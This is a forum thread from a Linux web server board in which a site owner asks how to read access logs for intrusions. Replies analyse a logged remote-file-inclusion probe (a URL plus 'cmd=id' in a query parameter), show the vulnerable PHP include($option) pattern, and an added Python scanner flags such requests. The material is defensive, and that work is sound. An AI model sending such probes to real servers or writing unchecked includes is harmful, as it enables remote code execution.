This is a discussion on "how access log tell intrusions?" within the Linux Web Servers forums, part of the Web Server and Related Forums category.
Hello,
How can I tell if my site has been hacked from looking at the access_log or other log files? I found the following log entry suspicious because of its 'option' part but cannot tell more than that, like what it really did to my site, etc.

access_log.2:65.8.116.62 - - [18/Dec/2004:17:56:51 -0600] "GET /rhel/index.php?option=http://www.setanet.com.br/cse.gif?&cmd=id HTTP/1.0" 200 7611 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

I bet there must be a lot of information or tools that can help detect intrusion by parsing access logs. I just don't know where to start. So I would appreciate any guidance or pointers.

Bing
bingster <bdu@iastate.edu> said:
> How can I tell if my site has been hacked from looking at the access_log or
> other log files? I found the following log entry suspicious because of
> its 'option' part but cannot tell more than that, like what it really
> did to my site, etc.
>
> access_log.2:65.8.116.62 - - [18/Dec/2004:17:56:51 -0600] "GET /rhel/index.php?option=http://www.setanet.com.br/cse.gif?&cmd=id HTTP/1.0" 200 7611 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

This looks like a variant of proxying - so, could it be that your server can be "fooled" to access and proxy arbitrary 3rd-party web resources by accessing through /rhel/index.php as shown above?

So, most possibly the above is done to circumvent local access restrictions at 65.8.116.62, and the harm done to you is loss of bandwidth and appearance of your IP address at www.setanet.com.br access logs (which might be a problem if the access to the 3rd-party site was malicious).

As this is your own site, go and read the /rhel/index.php script to see what it does when given the option query parameter. Also, think whether you need to expose the /rhel/ resource tree to the Internet.

-- 
Wolf a.k.a. Juha Laiho, Espoo, Finland
(GC 3.0) GIT d- s+: a C++ ULSH++++$ P++@ L+++ E- W+$@ N++ !K w !O !M V PS(+) PE Y+ PGP(+) t- 5 !X R !tv b+ !DI D G e+ h---- r+++ y++++
"...cancel my subscription to the resurrection!" (Jim Morrison)
Thanks very much for the heads-up. I did not quite get what you said.
Is there any tutorial-like information on what the effect is of embedding URL within other URL?

Bing

Juha Laiho wrote:
> bingster <bdu@iastate.edu> said:
>
>> How can I tell if my site has been hacked from looking at the access_log or
>> other log files? I found the following log entry suspicious because of
>> its 'option' part but cannot tell more than that, like what it really
>> did to my site, etc.
>>
>> access_log.2:65.8.116.62 - - [18/Dec/2004:17:56:51 -0600] "GET /rhel/index.php?option=http://www.setanet.com.br/cse.gif?&cmd=id HTTP/1.0" 200 7611 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
>
> This looks like a variant of proxying - so, could it be that your
> server can be "fooled" to access and proxy arbitrary 3rd-party web
> resources by accessing through /rhel/index.php as shown above?
>
> So, most possibly the above is done to circumvent local access
> restrictions at 65.8.116.62, and the harm done to you is loss of
> bandwidth and appearance of your IP address at www.setanet.com.br
> access logs (which might be a problem if the access to the 3rd-party
> site was malicious).
>
> As this is your own site, go and read the /rhel/index.php script to
> see what it does when given the option query parameter. Also, think
> whether you need to expose the /rhel/ resource tree to the Internet.
bingster <bdu@iastate.edu> writes:
> Thanks very much for the heads-up. I did not quite get what you
> said. Is there any tutorial-like information on what the effect is of
> embedding URL within other URL?

This depends entirely on the script. By default, absolutely no effect *but* some scripts may be set up to do one or more of:

a) Download the URL
b) Display a link to the URL
c) Send an HTTP redirect to the URL
d) Run arbitrary commands, as directed by the content of the URL
e) Format your hard disk
f) Play the 1812 overture from the server's internal speaker
g) Something else entirely

This particular thing looks a bit like a worm that's been going around that replaces random parameters in URLs with a URL, in the hope that 'd' will occur. With the number of badly written scripts on the web, it's bound to work eventually.

> Juha Laiho wrote:
> > bingster <bdu@iastate.edu> said:
> >> How can I tell if my site has been hacked from looking at the
> >> access_log or other log files? I found the following log entry
> >> suspicious because of its 'option' part but cannot tell more than
> >> that, like what it really did to my site, etc.

It's suspicious but maybe not dangerous. Look at the PHP script in question. If it does:

  include($option);

or

  require($option);

or something else similar, then you are in trouble. If you have PHP safe mode turned *on* you may be in much less trouble, as this blocks most arbitrary command execution.

If the script doesn't have something like that - it just does something like

  if ($option == 'one') {
    function_one(1,2,3);
  } else {
    function_two(4,5,6);
  }

then it's safe. If you don't understand PHP, you will need to learn PHP before determining if the script is safe to put a URL in the 'option' value. There are several PHP tutorials on the web, some good, some which will inadvertently encourage you into writing scripts that do 'd'...

-- 
Chris
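Bing asked where to start with tools that detect this kind of probe by parsing access logs, and Chris describes the pattern to look for (a query parameter whose value has been replaced by a URL). The following is an added example, written for this thread and not code from any poster: a small Python scanner for Apache combined-format log lines that flags URL-valued parameters and command-style parameters. The sample lines are constructed around the entry quoted above, and the set of command parameter names is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log line: host ident user [time] "request" status size "referer" "agent".
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# A query value that is itself a URL (scheme:// or protocol-relative //) is the
# "parameter replaced by a URL" probe pattern the thread describes.
URL_VALUE_RE = re.compile(r'^(?:[a-z][a-z0-9+.\-]*:)?//', re.IGNORECASE)
CMD_PARAMS = {"cmd", "command", "exec"}  # assumed names, not taken from the thread

def parse_line(line):
    """Return the fields of one access_log line, or None if not in combined format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def suspicious_params(target):
    """Return [(param, reason)] for query parameters that look like RFI probes."""
    query = urlsplit(target).query  # split at the first '?', so a URL's own '?' stays in the value
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if URL_VALUE_RE.match(value):
            findings.append((name, "value is a URL"))
        elif name.lower() in CMD_PARAMS:
            findings.append((name, "command parameter"))
    return findings

def scan(lines):
    """Return one report per line whose request carries suspicious parameters.
    'answered' marks a 200: the script replied to the probe, which on its own does
    not prove the include ran; that is why the thread says to read the script."""
    reports = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:  # malformed or truncated line: skip it rather than crash
            continue
        findings = suspicious_params(rec["target"])
        if findings:
            reports.append({"host": rec["host"], "status": int(rec["status"]),
                            "target": rec["target"], "findings": findings,
                            "answered": rec["status"] == "200"})
    return reports

# Constructed sample: the entry quoted in the thread, a benign request, and a truncated line.
SAMPLE_LOG = [
    '65.8.116.62 - - [18/Dec/2004:17:56:51 -0600] "GET /rhel/index.php?option=http://www.setanet.com.br/cse.gif?&cmd=id HTTP/1.0" 200 7611 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"',
    '192.0.2.10 - - [18/Dec/2004:18:01:02 -0600] "GET /rhel/index.php?option=one HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    'garbage line that is not in combined format',
]
```

Running `scan(SAMPLE_LOG)` reports only the first line, with both the URL-valued `option` and the `cmd` parameter flagged; a hit is a reason to read the script, as Chris and Juha say, not proof of compromise by itself.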
bingster <bdu@iastate.edu> said:
> Thanks very much for the heads-up. I did not quite get what you said.
> Is there any tutorial-like information on what the effect is of
> embedding URL within other URL?

Chris already pretty much answered this (so, all depends on how the program _on_your_machine_ interprets the data), but to emphasize one part of my previous reply:

>> As this is your own site, go and read the /rhel/index.php script to
>> see what it does when given the option query parameter. Also, think
>> whether you need to expose the /rhel/ resource tree to the Internet.

So, is the /rhel/ tree something you want to provide for anyone and everyone on the Internet? If not, disable public access to that.

-- 
Wolf a.k.a. Juha Laiho, Espoo, Finland